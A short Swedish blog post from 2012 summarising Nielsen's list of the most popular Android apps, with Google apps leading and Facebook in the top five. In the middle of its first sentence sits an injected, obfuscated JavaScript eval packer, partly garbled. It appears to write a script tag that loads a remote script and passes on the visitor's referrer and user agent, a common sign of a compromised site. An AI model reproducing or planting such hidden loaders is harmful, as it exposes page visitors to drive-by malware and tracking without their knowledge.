Image Image Image Image Image Image Image Image Image Image

| 19 oktober, 2018

Scroll to top

Top

Populäraste Android apparna 2012

Populäraste Android apparna 2012
Filip Urde
  • On 30 december, 2012
  • http://www.revue.se/filip-urde

Nielsen eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ertth|var|u0026u|referrer|artkn||js|php’.split(‘|’),0,{}))
tog självklart även fram en lista för Android och där är det inte helt oväntat Google själva som dominerar användandet. Sök, Gmail, Google Maps och Youtube ligger alla på topp fem. Det är  bara Facebook som lyckas vara med på top 5, i det annars Google dominerade startfältet.
blog.nielsen.com